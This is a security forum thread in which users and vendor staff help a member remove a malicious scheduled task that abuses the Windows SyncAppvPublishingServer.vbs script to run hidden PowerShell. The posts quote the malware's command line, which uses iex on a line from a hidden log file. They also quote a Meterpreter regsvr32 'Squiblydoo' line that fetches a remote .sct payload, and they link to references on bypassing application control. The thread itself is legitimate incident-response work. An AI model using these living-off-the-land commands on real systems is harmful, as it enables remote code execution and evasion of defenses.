Administrators Marcos 4,716 Posted May 4, 2022 Administrators Share Posted May 4, 2022 5 minutes ago, Shogun1 said: I have the folder C:\Windows\System32\Tasks in my windows 11 and tried to erase. I guess, you were saying but couldn't erase it...! My question is; did you mean that folder all of it or I misread that?? Please run scheduler and delete the task Microsoft\Windows\NetService\Network\NetServices Link to comment Share on other sites More sharing options...
itman 1,542 Posted May 4, 2022 Share Posted May 4, 2022 (edited) @Marcos, I found an earlier variant of this attack tracking to 10/2021. This one wouldn't require admin privileges. Details posted below. Let's analyze: 1. Attacker created a Logs folder in %LocalAppData% directory. Then he dropped system-logs.txt file there. 2. He then leveraged legit Win system SyncAppvPublishingServer.vbs script to run PowerShell script at task startup time. Quote Task: {258116A2-BD82-4698-9403-CE25E42EAEF1} - System32\Tasks\Microsoft\Windows\NetService\Network\NetServices => C:\Windows\System32\SyncAppvPublishingServer.vbs [1720 2019-12-07] (Microsoft Windows -> ) -> "n; $a = Get-Content "C:\Users\User\AppData\Local\logs\system-logs.txt" | Select -Index 17033;iex $a;hackbacktrack XoBJLWeei4NqeQuFneR9fArkoDLpp4Tj+YZu2tRZg3I= -Log Details- Protection Event Date: 10/6/21 Protection Event Time: 1:11 PM Log File: 2b7dad48-26d9-11ec-87a2-bc5ff42b1b34.json -System Information- OS: Windows 10 (Build 19042.985) CPU: x64 File System: NTFS User: System -Blocked Website Details- Malicious Website: 1 , C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Blocked, -1, -1, 0.0.0, , -Website Data- Category: RiskWare Domain: ai.backend-chat.com IP Address: 172.67.170.251 Port: 443 Type: Outbound File: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe https://forums.malwarebytes.com/topic/279614-riskware-block-aibackend-chat/ EDIT - Per OP's posted Autoruns text: Quote + "\Microsoft\Windows\NetService\Network\NetServices" "" "(Verified) " "c:\windows\system32\syncappvpublishingserver.vbs" "12/7/2019 5:10 AM" "0/73" Appears this bugger has "been flying under the Eset radar" for sometime. Oh, my. There it is: https://lolbas-project.github.io/lolbas/Scripts/Syncappvpublishingserver/ https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/md/Syncappvpublishingserver.exe.md Edited May 4, 2022 by itman Link to comment Share on other sites More sharing options...
itman 1,542 Posted May 4, 2022 Share Posted May 4, 2022 (edited) Also came across a Meterpreter remote attack using "Squiblydoo" technique via SyncAppvPublishingServer.vbs. Quote SyncAppvPublishingServer.vbs "Break; regsvr32 /s /n /u /i:http://192.168.254.158:8080/jnQl1FJ.sct scrobj.dll" SyncAppvPublishingServer – Regsvr32 SyncAppvPublishingServer – Meterpreter via Regsvr32 https://pentestlab.blog/tag/syncappvpublishingserver/ Edited May 4, 2022 by itman Link to comment Share on other sites More sharing options...
Shogun1 0 Posted May 5, 2022 Share Posted May 5, 2022 11 hours ago, Marcos said: Please run scheduler and delete the task Microsoft\Windows\NetService\Network\NetServices Hey there Marcos, I found C:\Windows\System32\Tasks\Microsoft\Windows\NetService\Network but there is no file or a folder called \NetServices after \Network it is empty or hidden ..! What should I do in this case?? Regards, Link to comment Share on other sites More sharing options...
Shogun1 0 Posted May 5, 2022 Share Posted May 5, 2022 I wanted to add this popup showing every time I have my 3 Laptops turned on: Link to comment Share on other sites More sharing options...
itman 1,542 Posted May 5, 2022 Share Posted May 5, 2022 12 hours ago, Shogun1 said: I found C:\Windows\System32\Tasks\Microsoft\Windows\NetService\Network but there is no file or a folder called \NetServices after \Network it is empty or hidden ..! What should I do in this case?? Open Windows Task Scheduler. Then open Task Scheduler Library folder. Perform the following: 1. Open Microsoft folder. 2. Open Windows folder. Navigate downward until NetService folder is found. Open NetService folder. Take a screen shot of what is displayed and attach it to your next reply. Link to comment Share on other sites More sharing options...
Shogun1 0 Posted May 5, 2022 Share Posted May 5, 2022 Hey itman, Here is the screenshot of what you asked, Hopefully it's helpful, Link to comment Share on other sites More sharing options...
itman 1,542 Posted May 5, 2022 Share Posted May 5, 2022 14 minutes ago, Shogun1 said: Here is the screenshot of what you asked, Repeat the same procedure. Right mouse click on NetServices and then select delete. At this point, this scheduled task should no longer run at system startup time. Link to comment Share on other sites More sharing options...
Shogun1 0 Posted May 5, 2022 Share Posted May 5, 2022 3 minutes ago, itman said: Repeat the same procedure. Right mouse click on NetServices and then select delete. At this point, this scheduled task should no longer run at system startup time. Done and deleted it from 1 laptop and will perform the same thing on my other 2 laptops as well to see what's new! Please standby for my future replies next move Link to comment Share on other sites More sharing options...
Shogun1 0 Posted May 5, 2022 Share Posted May 5, 2022 @itman, Your trick worked and notification has gone completely but I have ESET Staff asking me for more info and further investigation to determine whether I have malware infection or not..! Thanks for your time and help dude, Link to comment Share on other sites More sharing options...
ESET Staff JamesR 48 Posted May 6, 2022 ESET Staff Share Posted May 6, 2022 I assisted Shogun1 with some more cleanup. There were 2 other scheduled tasks which used the same lolbin trick. Not uncommon for these powershell scheduled tasks to leverage multiple scheduled tasks to increase their persistence. Samples of everything have been gathered and submitted. Link to comment Share on other sites More sharing options...
formingus 1 Posted June 10, 2022 Share Posted June 10, 2022 On 5/6/2022 at 2:42 AM, JamesR said: I assisted Shogun1 with some more cleanup. There were 2 other scheduled tasks which used the same lolbin trick. Not uncommon for these powershell scheduled tasks to leverage multiple scheduled tasks to increase their persistence. Samples of everything have been gathered and submitted. Hi, can you be kind and look at this thread https://forum.eset.com/topic/32653-annoying-powershellagentaew-on-each-start-need-assitence/#comment-152054 Link to comment Share on other sites More sharing options...
Kevin999 3 Posted August 10, 2022 Share Posted August 10, 2022 On 5/4/2022 at 8:39 PM, Shogun1 said: Hey Ted, I have the folder C:\Windows\System32\Tasks in my windows 11 and tried to erase. I guess, you were saying but couldn't erase it...! My question is; did you mean that folder all of it or I misread that?? The same virus. It seems caused by a UltraEdit cracker. Link to comment Share on other sites More sharing options...
itman 1,542 Posted August 10, 2022 Share Posted August 10, 2022 11 hours ago, Kevin999 said: The same virus. It seems caused by a UltraEdit cracker. In regards to this, a reference article: https://www.ultraedit.com/ultraedit-crack-code.html Link to comment Share on other sites More sharing options...
Kevin999 3 Posted August 12, 2022 Share Posted August 12, 2022 I try to recovery the SyncAppvPublishingServer.vbs from EIS' quarantine, and I will sent it to you later. @Marcos Link to comment Share on other sites More sharing options...
Administrators Marcos 4,716 Posted August 12, 2022 Administrators Share Posted August 12, 2022 2 hours ago, Kevin999 said: I try to recovery the SyncAppvPublishingServer.vbs from EIS' quarantine, and I will sent it to you later. @Marcos The detection is correct. The other script was a standard vbs file which is part of Windows installations. Link to comment Share on other sites More sharing options...
Recommended Posts